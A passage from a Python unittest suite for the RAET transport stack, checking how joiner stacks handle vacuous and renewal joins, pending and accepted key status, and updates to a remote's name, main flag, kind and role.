# Renew: Yes
self.join(beta, alpha, deid=betaRemote.nuid, renewal=True)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(self.sameAll(betaRemote, keep))
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerVacuousNorenewAcceptSameAll(self):
'''
Test joiner accept vacuous no renew join with sameall (E2)
'''
console.terse("{0}\n".format(self.testJoinerVacuousNorenewAcceptSameAll.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always (use never as most strict)
alpha, beta = self.bootstrapJoinedRemotes()
betaRemote = beta.remotes.values()[0]
# Name: Old
# Main: Old
# Kind: Old
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: Body
# Keys: Body
# Sameness: SameAll
keep = self.copyData(betaRemote)
# Mutable: Either (use No as more strict)
self.assertIs(beta.mutable, None)
beta.keep.auto = raeting.AutoMode.never.value
# Vacuous: Yes
betaRemote.fuid = 0
betaRemote.sid = 0
# Ensure remote status is Accepted
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
# Renew: No
self.join(beta, alpha, deid=betaRemote.nuid, renewal=False)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertIs(beta.mutable, None)
self.assertTrue(self.sameAll(betaRemote, keep))
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerVacuousPendingPendNewName(self):
'''
Test mutable joiner pend pending vacuous renewal join with updated name (F1)
'''
console.terse("{0}\n".format(self.testJoinerVacuousPendingPendNewName.__doc__))
alpha, alphaData = self.bootstrapStack(name='alpha',
ha=("", raeting.RAET_PORT),
main=True,
auto=raeting.AutoMode.once.value,
role=None,
kind=None,
mutable=True, )
self.assertIs(alpha.local.role, 'alpha')
self.assertEqual(alpha.ha, ('0.0.0.0', raeting.RAET_PORT))
self.assertEqual(alpha.local.ha, ('127.0.0.1', raeting.RAET_PORT))
beta, betaData = self.bootstrapStack(name='beta',
ha=("", raeting.RAET_TEST_PORT),
main=None,
auto=raeting.AutoMode.once.value,
role=None,
kind=None,
mutable=True, )
self.assertIs(beta.local.role, 'beta')
self.assertEqual(beta.ha, ('0.0.0.0', raeting.RAET_TEST_PORT))
self.assertEqual(beta.local.ha, ('127.0.0.1', raeting.RAET_TEST_PORT))
# Do initial join vacuous join to setup rejoin with renew
# create remote to join to alpha
remote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
self.join(beta, alpha, deid=remote.uid)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, True)
self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
alphaRemoteBeta = alpha.remotes.values()[0]
self.assertEqual(alphaRemoteBeta.name, 'beta')
betaRemoteAlpha = beta.remotes.values()[0]
self.assertEqual(betaRemoteAlpha.name, 'alpha')
# save the current state of beta stack remote for alpha
betaRemoteAlphaSave = self.copyData(betaRemoteAlpha)
# move alpha stack remote for beta to different uid (nuid) to force renew
oldUid = alphaRemoteBeta.uid
alpha.moveRemote(alphaRemoteBeta, alphaRemoteBeta.uid + 1)
self.assertNotEqual(alphaRemoteBeta.uid, oldUid)
self.assertIs(alpha.remotes[alphaRemoteBeta.uid], alphaRemoteBeta)
# Status: Pending
beta.keep.pendRemote(betaRemoteAlpha)
self.assertEqual(betaRemoteAlpha.acceptance, raeting.Acceptance.pending.value)
beta.keep.auto = raeting.AutoMode.never.value
self.assertEqual(beta.keep.auto, raeting.AutoMode.never.value)
# Name: New # have to do this mid transaction below
# Main: Either
# Kind: Either
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: Either
# Keys: Either
# Sameness: Not sameall
# Mutable: Yes
self.assertIs(beta.mutable, True)
# Ensure remote status is Pending
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
beta.clearStats()
alpha.clearStats()
# Test
# Renew: Yes
# Name change of Joinent on renew rejoin could occur several ways
# One is Joinent is dynamically changing its name mid transaction
# Another is Joinent name was changed between end of
# Join where Joinent refused with nack renew transaction
# and start of Joiner renew rejoin We implement the later
# to do this we manually step through the transactions
console.terse("\n Rejoin Failed with nack Renew Transaction **************\n")
beta.join(uid=betaRemoteAlpha.uid) #join
beta.serviceOneAllTx()
self.store.advanceStamp(0.05)
time.sleep(0.05)
alpha.serviceOneAllRx()
alpha.serviceOneAllTx() # Ack Renew
self.store.advanceStamp(0.05)
time.sleep(0.05)
# Close down alpha stack
alpha.server.close()
alpha.clearAllKeeps()
# now create new Joinent stack with new name but same role
gamma, gammaData = self.bootstrapStack(name='gamma',
ha=("", raeting.RAET_PORT),
main=True,
auto=raeting.AutoMode.once.value,
role='alpha',
sigkey=alpha.local.signer.keyhex,
prikey=alpha.local.priver.keyhex,
kind=None,
mutable=True, )
self.assertEqual(gamma.name, 'gamma')
self.assertEqual(gamma.ha, ('0.0.0.0', raeting.RAET_PORT))
self.assertEqual(gamma.local.ha, ('127.0.0.1', raeting.RAET_PORT))
self.assertEqual(gamma.local.role, 'alpha')
self.assertEqual(gamma.local.signer.keyhex, alpha.local.signer.keyhex)
self.assertEqual(gamma.local.priver.keyhex, alpha.local.priver.keyhex)
# now allow socket to send packet resume transaction
console.terse("\n Renew Rejoin Transaction **************\n")
self.serviceStacks([beta, gamma])
# Action: Pend, Dump
self.assertIn('joiner_rx_renew', beta.stats)
self.assertEqual(beta.stats['joiner_rx_renew'], 1)
self.assertIn('join_renew_attempt', beta.stats)
self.assertEqual(beta.stats['join_renew_attempt'], 1)
self.assertIn('joinent_rx_pend', gamma.stats)
self.assertEqual(gamma.stats['joinent_rx_pend'], 2)
for stack in [gamma, beta]:
self.assertEqual(len(stack.transactions), 1)
self.assertEqual(len(stack.remotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
gammaRemoteBeta = gamma.remotes.values()[0]
self.assertIs(gammaRemoteBeta.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(beta.mutable, True)
betaRemoteGamma = beta.remotes.values()[0]
self.assertIs(betaRemoteAlpha, betaRemoteGamma) # same remote on beta side
self.assertFalse(self.sameAll(betaRemoteGamma, betaRemoteAlphaSave))
self.assertTrue(self.sameRoleKeys(betaRemoteGamma, betaRemoteAlphaSave))
self.assertEqual(betaRemoteGamma.name, gamma.name)
self.assertIs(betaRemoteGamma.acceptance, raeting.Acceptance.pending.value)
# Check remote dump with pended data
remoteData = beta.keep.loadRemoteData(gamma.local.name)
self.assertIsNot(remoteData, None)
self.assertEqual(remoteData['name'], gamma.name) # new name value
self.assertEqual(remoteData['fuid'], gammaRemoteBeta.nuid) # new value
self.assertEqual(remoteData['role'], gamma.local.role)
self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(remoteData['verhex']), gamma.local.signer.verhex)
self.assertEqual(ns2b(remoteData['pubhex']), gamma.local.priver.pubhex)
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(gamma.local.role)
self.assertEqual(roleData['role'], gamma.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), gamma.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), gamma.local.priver.pubhex)
# Accept the transaction
console.terse("\nAccept Transaction **************\n")
beta.keep.acceptRemote(betaRemoteAlpha)
self.serviceStacks([gamma, beta], duration=3.0)
for stack in [gamma, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(beta.mutable)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
self.assertEqual(betaRemoteGamma.name, gamma.name) # new name value
self.assertIn('join_correspond_complete', gamma.stats)
self.assertEqual(gamma.stats['join_correspond_complete'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(gamma.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemoteGamma, remoteData))
self.assertIs(remoteData['main'], True) # new main value
self.assertIs(remoteData['fuid'], gammaRemoteBeta.uid) # value
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(gamma.local.role)
self.assertEqual(roleData['role'], gamma.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), gamma.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), gamma.local.priver.pubhex)
for stack in [gamma, beta]:
stack.server.close()
stack.clearAllKeeps()
    def testJoinerVacuousPendingPendNewMain(self):
        '''
        Test mutable joiner pend pending vacuous renewal join with updated main (F2)
        '''
        console.terse("{0}\n".format(self.testJoinerVacuousPendingPendNewMain.__doc__))
        # Bootstrap: alpha is the main stack, beta the joiner; both mutable so
        # remote attribute changes may be applied during join
        alpha, alphaData = self.bootstrapStack(name='alpha',
                                               ha=("", raeting.RAET_PORT),
                                               main=True,
                                               auto=raeting.AutoMode.once.value,
                                               role=None,
                                               kind=None,
                                               mutable=True, )
        self.assertIs(alpha.local.role, 'alpha')
        self.assertEqual(alpha.ha, ('0.0.0.0', raeting.RAET_PORT))
        self.assertEqual(alpha.local.ha, ('127.0.0.1', raeting.RAET_PORT))
        beta, betaData = self.bootstrapStack(name='beta',
                                             ha=("", raeting.RAET_TEST_PORT),
                                             main=None,
                                             auto=raeting.AutoMode.once.value,
                                             role=None,
                                             kind=None,
                                             mutable=True, )
        self.assertIs(beta.local.role, 'beta')
        self.assertEqual(beta.ha, ('0.0.0.0', raeting.RAET_TEST_PORT))
        self.assertEqual(beta.local.ha, ('127.0.0.1', raeting.RAET_TEST_PORT))
        # Do initial join vacuous join to setup rejoin with renew
        # create remote to join to alpha
        remote = beta.addRemote(estating.RemoteEstate(stack=beta,
                                                      fuid=0, # vacuous join
                                                      sid=0, # always 0 for join
                                                      ha=alpha.local.ha))
        self.join(beta, alpha, deid=remote.uid)
        # After the initial join both sides hold exactly one joined remote
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, True)
                self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
        alphaRemoteBeta = alpha.remotes.values()[0]
        self.assertIs(alphaRemoteBeta.main, False)
        betaRemoteAlpha = beta.remotes.values()[0]
        self.assertIs(betaRemoteAlpha.main, True)
        # now set the alpha.main to False and rejoin as the initial condition
        alpha.main = False
        self.assertIs(alpha.main, False)
        self.join(beta, alpha, deid=remote.uid)
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, True)
                self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
        betaRemoteAlpha = beta.remotes.values()[0]
        self.assertIs(betaRemoteAlpha.main, False)
        # save the current state of beta stack remote for alpha
        betaRemoteAlphaSave = self.copyData(betaRemoteAlpha)
        # move alpha stack remote for beta to different uid (nuid) to force renew
        oldUid = alphaRemoteBeta.uid
        alpha.moveRemote(alphaRemoteBeta, alphaRemoteBeta.uid + 1)
        self.assertNotEqual(alphaRemoteBeta.uid, oldUid)
        self.assertIs(alpha.remotes[alphaRemoteBeta.uid], alphaRemoteBeta)
        # Status: Pending
        beta.keep.pendRemote(betaRemoteAlpha)
        self.assertEqual(betaRemoteAlpha.acceptance, raeting.Acceptance.pending.value)
        beta.keep.auto = raeting.AutoMode.never.value
        self.assertEqual(beta.keep.auto, raeting.AutoMode.never.value)
        # Name: Either
        # Main: New # old value was False now we change to True
        oldMain = alpha.main
        alpha.main = True
        self.assertIs(alpha.main, True)
        self.assertNotEqual(alpha.main, oldMain)
        # Kind: Either
        # RHA: Old
        # Nuid: Old
        # Fuid: Body
        # Leid: Old
        # Reid: 0
        # Role: Either
        # Keys: Either
        # Sameness: Not sameall
        # Mutable: Yes
        self.assertIs(beta.mutable, True)
        # Ensure remote status is Pending
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
        self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
        beta.clearStats()
        alpha.clearStats()
        # Test
        # Renew: Yes
        self.join(beta, alpha, deid=betaRemoteAlpha.uid, duration=0.5)
        # Action: Pend, Dump
        self.assertIn('joiner_rx_renew', beta.stats)
        self.assertEqual(beta.stats['joiner_rx_renew'], 1)
        self.assertIn('join_renew_attempt', beta.stats)
        self.assertEqual(beta.stats['join_renew_attempt'], 1)
        self.assertIn('stale_nuid', alpha.stats)
        self.assertEqual(alpha.stats['stale_nuid'], 1)
        self.assertIn('joinent_rx_pend', alpha.stats)
        # NOTE(review): presumably pended once for the stale-nuid renew and once
        # for the rejoin, hence 2 -- confirm against the joinent state machine
        self.assertEqual(alpha.stats['joinent_rx_pend'], 2)
        # Transaction remains open while beta holds alpha pending
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 1)
            self.assertEqual(len(stack.remotes), 1)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, None)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
        self.assertIs(beta.mutable, True)
        self.assertFalse(self.sameAll(betaRemoteAlpha, betaRemoteAlphaSave))
        self.assertTrue(self.sameRoleKeys(betaRemoteAlpha, betaRemoteAlphaSave))
        self.assertEqual(betaRemoteAlpha.main, alpha.main)
        self.assertIs(alphaRemoteBeta.acceptance, raeting.Acceptance.accepted.value)
        self.assertIs(betaRemoteAlpha.acceptance, raeting.Acceptance.pending.value)
        # Check remote dump with pended data
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        self.assertIsNot(remoteData, None)
        self.assertIs(remoteData['main'], alpha.main) # new main value
        self.assertIs(remoteData['fuid'], alphaRemoteBeta.nuid) # new value
        self.assertEqual(remoteData['role'], alpha.local.role)
        self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
        self.assertEqual(ns2b(remoteData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(remoteData['pubhex']), alpha.local.priver.pubhex)
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
        self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
        # Accept the transaction
        console.terse("\nAccept Transaction **************\n")
        beta.keep.acceptRemote(betaRemoteAlpha)
        # service long enough for the pended join to run to completion
        self.serviceStacks([alpha, beta], duration=3.0)
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            for remote in stack.remotes.values():
                self.assertTrue(remote.joined)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
                self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
        self.assertTrue(beta.mutable)
        self.assertIn('join_initiate_complete', beta.stats)
        self.assertEqual(beta.stats['join_initiate_complete'], 1)
        self.assertIs(betaRemoteAlpha.main, alpha.main) # new main value
        self.assertIn('join_correspond_complete', alpha.stats)
        self.assertEqual(alpha.stats['join_correspond_complete'], 1)
        # Check remote dump
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        remoteData['ha'] = tuple(remoteData['ha'])
        self.assertTrue(self.sameAll(betaRemoteAlpha, remoteData))
        self.assertIs(remoteData['main'], True) # new main value
        self.assertIs(remoteData['fuid'], alphaRemoteBeta.uid) # value
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
        self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
        # Teardown: close sockets and clear persisted keep files
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinerVacuousPendingPendNewKind(self):
        '''
        Test mutable joiner pend pending vacuous renewal join with updated kind (F3)
        '''
        console.terse("{0}\n".format(self.testJoinerVacuousPendingPendNewKind.__doc__))
        # Bootstrap: alpha is the main stack, beta the joiner; both mutable
        alpha, alphaData = self.bootstrapStack(name='alpha',
                                               ha=("", raeting.RAET_PORT),
                                               main=True,
                                               auto=raeting.AutoMode.once.value,
                                               role=None,
                                               kind=None,
                                               mutable=True, )
        self.assertIs(alpha.local.role, 'alpha')
        self.assertEqual(alpha.ha, ('0.0.0.0', raeting.RAET_PORT))
        self.assertEqual(alpha.local.ha, ('127.0.0.1', raeting.RAET_PORT))
        beta, betaData = self.bootstrapStack(name='beta',
                                             ha=("", raeting.RAET_TEST_PORT),
                                             main=None,
                                             auto=raeting.AutoMode.once.value,
                                             role=None,
                                             kind=None,
                                             mutable=True, )
        self.assertIs(beta.local.role, 'beta')
        self.assertEqual(beta.ha, ('0.0.0.0', raeting.RAET_TEST_PORT))
        self.assertEqual(beta.local.ha, ('127.0.0.1', raeting.RAET_TEST_PORT))
        # Do initial join vacuous join to setup rejoin with renew
        # create remote to join to alpha
        remote = beta.addRemote(estating.RemoteEstate(stack=beta,
                                                      fuid=0, # vacuous join
                                                      sid=0, # always 0 for join
                                                      ha=alpha.local.ha))
        self.join(beta, alpha, deid=remote.uid)
        # After the initial join both sides hold exactly one joined remote
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, True)
                self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
        alphaRemoteBeta = alpha.remotes.values()[0]
        self.assertIs(alphaRemoteBeta.kind, 0)
        betaRemoteAlpha = beta.remotes.values()[0]
        self.assertIs(betaRemoteAlpha.kind, 0)
        # save the current state of beta stack remote for alpha
        betaRemoteAlphaSave = self.copyData(betaRemoteAlpha)
        # move alpha stack remote for beta to different uid (nuid) to force renew
        oldUid = alphaRemoteBeta.uid
        alpha.moveRemote(alphaRemoteBeta, alphaRemoteBeta.uid + 1)
        self.assertNotEqual(alphaRemoteBeta.uid, oldUid)
        self.assertIs(alpha.remotes[alphaRemoteBeta.uid], alphaRemoteBeta)
        # Status: Pending
        beta.keep.pendRemote(betaRemoteAlpha)
        self.assertEqual(betaRemoteAlpha.acceptance, raeting.Acceptance.pending.value)
        beta.keep.auto = raeting.AutoMode.never.value
        self.assertEqual(beta.keep.auto, raeting.AutoMode.never.value)
        # Name: Either
        # Main: Either
        # Kind: New # old value was None (0) now we change to 3
        oldKind = alpha.kind
        alpha.kind = 3
        self.assertIs(alpha.kind, 3)
        self.assertNotEqual(alpha.kind, oldKind)
        # RHA: Old
        # Nuid: Old
        # Fuid: Body
        # Leid: Old
        # Reid: 0
        # Role: Either
        # Keys: Either
        # Sameness: Not sameall
        # Mutable: Yes
        self.assertIs(beta.mutable, True)
        beta.clearStats()
        alpha.clearStats()
        # Ensure remote status is Pending
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
        self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
        # Test
        # Renew: Yes
        self.join(beta, alpha, deid=betaRemoteAlpha.uid, duration=0.5)
        # Action: Pend, Dump
        self.assertIn('joiner_rx_renew', beta.stats)
        self.assertEqual(beta.stats['joiner_rx_renew'], 1)
        self.assertIn('join_renew_attempt', beta.stats)
        self.assertEqual(beta.stats['join_renew_attempt'], 1)
        self.assertIn('stale_nuid', alpha.stats)
        self.assertEqual(alpha.stats['stale_nuid'], 1)
        self.assertIn('joinent_rx_pend', alpha.stats)
        # NOTE(review): presumably pended once for the stale-nuid renew and once
        # for the rejoin, hence 2 -- confirm against the joinent state machine
        self.assertEqual(alpha.stats['joinent_rx_pend'], 2)
        # Transaction remains open while beta holds alpha pending
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 1)
            self.assertEqual(len(stack.remotes), 1)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, None)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
        self.assertIs(beta.mutable, True)
        self.assertFalse(self.sameAll(betaRemoteAlpha, betaRemoteAlphaSave))
        self.assertTrue(self.sameRoleKeys(betaRemoteAlpha, betaRemoteAlphaSave))
        self.assertEqual(betaRemoteAlpha.kind, alpha.kind)
        self.assertIs(alphaRemoteBeta.acceptance, raeting.Acceptance.accepted.value)
        self.assertIs(betaRemoteAlpha.acceptance, raeting.Acceptance.pending.value)
        # Check remote dump with pended data
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        self.assertIsNot(remoteData, None)
        self.assertIs(remoteData['kind'], alpha.kind) # new kind value
        self.assertIs(remoteData['fuid'], alphaRemoteBeta.nuid) # new value
        self.assertEqual(remoteData['role'], alpha.local.role)
        self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
        self.assertEqual(ns2b(remoteData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(remoteData['pubhex']), alpha.local.priver.pubhex)
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
        self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
        # Accept the transaction
        console.terse("\nAccept Transaction **************\n")
        beta.keep.acceptRemote(betaRemoteAlpha)
        # service long enough for the pended join to run to completion
        self.serviceStacks([alpha, beta], duration=3.0)
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            for remote in stack.remotes.values():
                self.assertTrue(remote.joined)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
                self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
        self.assertTrue(beta.mutable)
        self.assertIn('join_initiate_complete', beta.stats)
        self.assertEqual(beta.stats['join_initiate_complete'], 1)
        self.assertIs(betaRemoteAlpha.kind, alpha.kind) # new kind value
        self.assertIn('join_correspond_complete', alpha.stats)
        self.assertEqual(alpha.stats['join_correspond_complete'], 1)
        # Check remote dump
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        remoteData['ha'] = tuple(remoteData['ha'])
        self.assertTrue(self.sameAll(betaRemoteAlpha, remoteData))
        self.assertIs(remoteData['kind'], 3) # new kind value
        self.assertIs(remoteData['fuid'], alphaRemoteBeta.uid) # value
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
        self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
        # Teardown: close sockets and clear persisted keep files
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinerVacuousPendingPendNewRole(self):
        '''
        Test mutable joiner pend pending vacuous renewal join with updated role (F4)
        '''
        console.terse("{0}\n".format(self.testJoinerVacuousPendingPendNewRole.__doc__))
        # Bootstrap: alpha is the main stack, beta the joiner; both mutable
        alpha, alphaData = self.bootstrapStack(name='alpha',
                                               ha=("", raeting.RAET_PORT),
                                               main=True,
                                               auto=raeting.AutoMode.once.value,
                                               role=None,
                                               kind=None,
                                               mutable=True, )
        self.assertIs(alpha.local.role, 'alpha')
        self.assertEqual(alpha.ha, ('0.0.0.0', raeting.RAET_PORT))
        self.assertEqual(alpha.local.ha, ('127.0.0.1', raeting.RAET_PORT))
        beta, betaData = self.bootstrapStack(name='beta',
                                             ha=("", raeting.RAET_TEST_PORT),
                                             main=None,
                                             auto=raeting.AutoMode.once.value,
                                             role=None,
                                             kind=None,
                                             mutable=True, )
        self.assertIs(beta.local.role, 'beta')
        self.assertEqual(beta.ha, ('0.0.0.0', raeting.RAET_TEST_PORT))
        self.assertEqual(beta.local.ha, ('127.0.0.1', raeting.RAET_TEST_PORT))
        # Do initial join vacuous join to setup rejoin with renew
        # create remote to join to alpha
        remote = beta.addRemote(estating.RemoteEstate(stack=beta,
                                                      fuid=0, # vacuous join
                                                      sid=0, # always 0 for join
                                                      ha=alpha.local.ha))
        self.join(beta, alpha, deid=remote.uid)
        # After the initial join both sides hold exactly one joined remote
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, True)
                self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
        alphaRemoteBeta = alpha.remotes.values()[0]
        self.assertEqual(alphaRemoteBeta.role, 'beta')
        betaRemoteAlpha = beta.remotes.values()[0]
        self.assertEqual(betaRemoteAlpha.role, 'alpha')
        # save the current state of beta stack remote for alpha
        betaRemoteAlphaSave = self.copyData(betaRemoteAlpha)
        # move alpha stack remote for beta to different uid (nuid) to force renew
        oldUid = alphaRemoteBeta.uid
        alpha.moveRemote(alphaRemoteBeta, alphaRemoteBeta.uid + 1)
        self.assertNotEqual(alphaRemoteBeta.uid, oldUid)
        self.assertIs(alpha.remotes[alphaRemoteBeta.uid], alphaRemoteBeta)
        # Status: Pending
        beta.keep.pendRemote(betaRemoteAlpha)
        self.assertEqual(betaRemoteAlpha.acceptance, raeting.Acceptance.pending.value)
        beta.keep.auto = raeting.AutoMode.never.value
        self.assertEqual(beta.keep.auto, raeting.AutoMode.never.value)
        # Name: Either
        # Main: Old
        # Kind: Either
        # RHA: Old
        # Nuid: Old
        # Fuid: Body
        # Leid: Old
        # Reid: 0
        # Role: New
        oldRole = alpha.local.role
        alpha.local.role = 'alpha_new'
        self.assertIs(alpha.local.role, 'alpha_new')
